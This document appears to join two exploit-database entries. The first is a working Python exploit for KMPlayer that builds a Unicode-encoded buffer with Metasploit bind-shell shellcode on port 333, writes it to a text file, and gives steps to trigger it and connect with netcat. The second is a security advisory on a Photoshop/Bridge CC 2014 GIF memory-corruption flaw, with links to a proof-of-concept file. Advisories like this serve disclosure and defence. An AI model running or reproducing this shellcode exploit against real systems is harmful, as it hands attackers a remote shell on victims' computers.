# chmod +x KMPlayer.py
# python KMPlayer.py
# Alt+c | Video Capture | Alt+a | Audio Capture
# paste content of KMPlayer.txt into Filename
# nc 172.20.10.14 333
#
# Video: http://youtu.be/9gtZxR2ioTM
##

buffer = (
    "\x50"                          # PUSH EAX
    "\x40"                          # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
    "\x5c"                          # POP ESP
    "\x40"                          # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
    "\x61"                          # POPAD
    "\x45"                          # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
    "" + ("\x5f\x45" * 125) + ""    # (POP EDI/Venetian Padding => ADD BYTE PTR SS:[EBP],AL)*125
    "\x54"                          # PUSH ESP
    "\x45"                          # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
    "\x45"                          # Padding => INC EBP
    "\x45"                          # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
    "\x61"                          # POPAD
    "\x47"                          # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
    "\x33\x77"                      # POP EBP/RETN from KMPlayer.exe
    "\x58"                          # POP EAX
    "\x47"                          # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
    "\x33\x77"                      # POP EBP/RETN from KMPlayer.exe
    "\x58"                          # POP EAX
    "\x47"                          # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
    "\x33\x77"                      # POP EBP/RETN from KMPlayer.exe
    "\x5d"                          # POP EBP
    "\x47"                          # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
    "\x71"                          # Padding => JNO SHORT 0x2
    "\x71"                          # Venetian Padding => ADD BYTE PTR DS:[ECX],DH
)

# msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
shellcode = ("\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
             "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
             "\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41"
             "\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
             "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49"
             "\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
             "\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a"
             "\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
             "\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39"
             "\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b"
             "\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b"
             "\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66"
             "\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c"
             "\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72"
             "\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e"
             "\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48"
             "\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a"
             "\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b"
             "\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76"
             "\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45"
             "\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33"
             "\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63"
             "\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59"
             "\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59"
             "\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31"
             "\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b"
             "\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49"
             "\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74"
             "\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37"
             "\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34"
             "\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46"
             "\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30"
             "\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77"
             "\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71"
             "\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51"
             "\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37"
             "\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f"
             "\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55"
             "\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69"
             "\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39"
             "\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e"
             "\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44"
             "\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c"
             "\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46"
             "\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71"
             "\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45"
             "\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63"
             "\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b"
             "\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65"
             "\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a"
             "\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a"
             "\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45"
             "\x41\x41")

buffer += shellcode + "\x71" * (1534 - len(shellcode))
open("KMPlayer.txt", "wb").write(buffer)
-
Photoshop CC2014 / Bridge CC 2014 - '.gif' Parsing Memory Corruption
#####################################################################################
Application: Adobe Photoshop CC 2014 & Bridge CC 2014
Platforms: Windows
Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
Secunia:
{PRL}: 2015-07
Author: Francis Provencher (Protek Research Lab’s)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X. Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB, CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshop’s featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)

#####################################################################################

============================
2) Report Timeline
============================
2015-03-15: Francis Provencher from Protek Research Lab’s found the issue;
2015-03-19: Francis Provencher from Protek Research Lab’s reported the vulnerability to PSIRT;
2015-05-16: Adobe released a patch (APSB15-12)

#####################################################################################

============================
3) Technical details
============================
An error in the GIF parser could lead to a memory corruption when processing a crafted GIF image with an invalid value in the “ImageLeftPosition” field of the “ImageDescriptor”. Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.

#####################################################################################

===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-07.gif
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37347.gif

###############################################################################